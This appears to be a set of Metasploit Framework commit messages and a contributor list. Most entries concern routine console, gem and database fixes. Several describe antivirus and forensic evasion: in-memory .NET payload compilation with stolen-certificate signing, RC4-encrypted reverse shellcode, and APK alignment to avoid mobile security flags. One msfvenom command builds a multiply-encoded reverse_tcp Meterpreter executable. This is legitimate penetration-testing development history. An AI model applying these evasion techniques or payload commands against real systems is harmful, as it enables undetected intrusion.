sometimes, as a user, you need to start a handler
but don't want to exit your current console context.
The new handler command allows a user to spin up a handler
in background job without switching contexts
Came up on Twitter, where Justin may have been trolling a little:
https://twitter.com/jstnkndy/status/798671298302017536
We have a `print_good` method, but not a `print_bad`, which seems a
little weird for Ruby -- opposite methods should be intuitive as Justin
is implying.
Anyway, I went with alias_method, thanks to the compelling argument at
https://github.com/bbatsov/ruby-style-guide#alias-method
...since Metasploit is all about the singleton, and didn't want to risk
some unexpected scoping thing.
Also dang, we define the `print_` methods like fifty billion times!
Really should fix that some day.
This commit moves much of the platform-specific logic from the
reverse_http handler down into the payloads. This makes the handler
a bit more agnostic of what the payload is (which is a good thing).
There is more to do here though, and things can be improved.
Handling of datastore settings has been changed to make room for the
ability to override the datastore completely when generating the
payloads. If a datastore is given via the `opts` then this is used
instead otherwise it falls back to the settings specified in the usual
datatstore location.
Down the track, we'll have a payload that supports multiple stages, and
the datastore will be generated on the fly, along with the stage itself.
Without this work, there's no other nice way of getting datastore
settings to be contained per-stager.
when moving to the rex-exploitation gem some of the
file references were missed, partially due to silly differences
between how each file was referenced
Fixes#7466
MS-2073
* imports are slow mainly caused by fingerprinting after every service creation
* now only fingerprints after all the services are created for imports
cmd_psh_payload relies on datastore options to have a proper
data type down the call chain. When modules are created with string
values for all data store options, a conditional naively checking
what should be a boolean value for false/nil? would return true
for a string representation of "false."
Ensure that datastore options are validated prior to using them
to set variables passed into Rex methods.
Allow passing exec_in_place parameter to cmd_psh_payload in order
to execute raw powershell without the commandline wrappers of
comspec or calling the powershell binary itself.
This is useful in contexts such as the web delivery mechanism or
recent powershell sessions as it does not require the creation of
a new PSH instance.
Add Exploit::Powershell::DotNet namespace with compiler and
runtime elevator.
Add compiler modules for payloads and custom .NET code/blocks.
==============
Powershell-based persistence module to compile .NET templates
with MSF payloads into binaries which persist on host.
Templates by @hostess (way back in 2012).
C# templates for simple binaries and a service executable with
its own install wrapper.
==============
Generic .NET compiler post module
Compiles .NET source code to binary on compromised hosts.
Useful for home-grown APT deployment, decoy creation, and other
misdirection or collection activities.
Using mimikatz (kiwi), one can also extract host-resident certs
and use them to sign the generated binary, thus creating a
locally trusted exe which helps with certain defensive measures.
==============
Concept:
Microsoft has graciously included a compiler in every modern
version of Windows. Although executables which can be easily
invoked by the user may not be present on all hosts, the
shared runtime of .NET and Powershell exposes this functionality
to all users with access to Powershell.
This commit provides a way to execute the compiler entirely in
memory, seeking to avoid disk access and the associated forensic
and defensive measures. Resulting .NET assemblies can be run
from memory, or written to disk (with the option of signing
them using a pfx cert on the host). Two basic modules are
provided to showcase the functionality and execution pipeline.
Usage notes:
Binaries generated this way are dynamic by nature and avoid sig
based detection. Heuristics, sandboxing, and other isolation
mechanisms must be defeated by the user for now. Play with
compiler options, included libraries, and runtime environments
for maximum entropy before you hit the temmplates.
Defenders should watch for:
Using this in conjunction with WMI/PS remoting or other MSFT
native distributed execution mechanism can bring malware labs
to their knees with properly crafted templates.
The powershell code to generate the binaries also provides a
convenient method to leave behind complex trojans which are not
yet in binary form, nor will they be until execution (which can
occur strictly in memory avoiding disk access for the final
product).
==============
On responsible disclosure: I've received some heat over the years
for prior work in this arena. Everything here is already public,
and has been in closed PRs in the R7 repo for years. The bad guys
have had this for a while (they do their homework religiously),
defenders need to be made aware of this approach and prepare
themselves to deal with it.
Differences in transport configuration and the actual payload do
not allow a direct splice of the original files included.
Clean up the payload generator to work with upstream handler,
payload, and transport configuration implementation.
Initial testing shows inbound sessions are created and SSL cert
is now properly attaching to the handler.
Running zipalign on an APK after signing and before distribution
is considered general best practice. Also, properly aligning an APK
makes it less likely to be flagged as suspicious by mobile security
solutions.
More on zipalign from Google:
https://developer.android.com/studio/command-line/zipalign.html
This new command is a simpler shortcut that allows for moving around sessions much faster from within the console.
* From inside MSF, `sess <id>` is shorthand for `sessions -i <id>`
* From inside Meterp, `sess <id>` is shorthand for `background; sessions -i <id>`
In the latter case, if the session being switched to is the same id, then no swiching happens.
The notes -d command is always expecting a host address, but
fileformat exploits don't have this type of information when the
exploit file is generated, therefore there isn't enough fields
provided for Rex table.
Fix#7019
In BrowserAutoPwn2, the mixin forgets to pass the SRVPORT datastore
option to the exploits, so they always use the default 8080. As a
result, if a different SRVPORT is set, BAP2 would be serving the
target machine with bad exploit links.
Fix#7021
Users reported (in GitHub issue #7008) hitting an exception when attempting to export the contents of the msf database (i.e. workspaces, hosts, events, etc.) via the 'db_export' command. After some digging, it appears there were a few ActiveRecord changes with the new Rails upgrade that require a couple mods to the way we are querying.
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention
MS-1688
Small fix here to ensure that, even when boolean 'option' variables have a default value of 'true', that their current value is correctly reflected via the 'show options' command. This change should play fine with all other option variable types, I believe.
Current behavior:
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > get STORE_LOOT
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set NEW_VERSION false
NEW_VERSION => false
msf auxiliary(darkcomet_filedownloader) > get NEW_VERSION
NEW_VERSION => false
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
```
New behavior with this change:
```
msf > use auxiliary/gather/darkcomet_filedownloader
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION true no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT true no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
msf auxiliary(darkcomet_filedownloader) > set STORE_LOOT false
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > get STORE_LOOT
STORE_LOOT => false
msf auxiliary(darkcomet_filedownloader) > set NEWVERSION false
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > get NEWVERSION
NEWVERSION => false
msf auxiliary(darkcomet_filedownloader) > show options
Module options (auxiliary/gather/darkcomet_filedownloader):
Name Current Setting Required Description
---- --------------- -------- -----------
BRUTETIMEOUT 1 no Timeout (in seconds) for bruteforce attempts
KEY no DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)
LHOST 0.0.0.0 yes This is our IP (as it appears to the DarkComet C2 server)
NEWVERSION false no Set to true if DarkComet version >= 5.1, set to false if version < 5.1
RHOST 0.0.0.0 yes The target address
RPORT 1604 yes The target port
STORE_LOOT false no Store file in loot (will simply output file to console if set to false).
TARGETFILE no Target file to download (assumes password is set)
```
Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
Currently any existing and future JCL payload has to have a 'job card'
basically data that defines the job to z/OS. It has information about
the job's owner, place it will run, output creation, etc. All JCL
shares the same job card format. As such, creating a shared payload
method that allows this text to be imported into any JCL payload.
Additionally, that job card is now parameterized, allowing the
exploit/payload user to edit these job card values-as this may be needed
in order to run the job sucessfully on any given system.
This PR sets up the mf module - next PRs will update the existing
payloads to use this module.
rex-text, rex-random_identifier, rex-powershell, rex-zip, and rex-registry
are now being pulled in as gems instead of part of the spgehtti code that is lib/rex
someone tried to fix a rails deprecation warning by doing an
eager load, but caused an actual exception instead. switching to
propper joins makes everything work properly
MS-1593
The exception handling in the #exploit_simple method tries to set
error on exploit but exploit is defined within the begin block
causing a noMethodError on nilClass
MS-1608
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix#4885
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.
For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.
Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.
Testing:
Win2k8r2
ToDo:
Update payload sizes when this branch is "complete"
Ensure UUIDs and adjacent black magic all work properly
Misc:
Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.
Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.
Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.
Testing:
Tested against Win2k8r2, Win7x64, and WinXPx86
ToDo:
Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.
this method was absed around a char limit
for the desc column which no longer exists
trying to perform this operation generates an error
removing the method since it is not needed
OJ
Adam Cammack
Brent Cook
David Maloney
Jeffrey Martin
Brendan
darkbushido
Tim
Jin Qian
James Lee
wchen-r7
h00die
Brian Yip
Tod Beardsley
dana-at-cp
Sonny Gonzalez
Louis Sato
Jon Hart
William Vu
Justin Steven
Brent Cook
RageLtMan
Pearce Barry
dmohanty-r7
Spencer McIntyre
“Brian
Christian Mehlmauer
William Webb
Tim Wright
scriptjunkie
forzoni
HD Moore
agix
Bigendian Smalls
thao doan
h00die
Trenton Ivey
Brian Patterson
James Barnett
Rob Fuller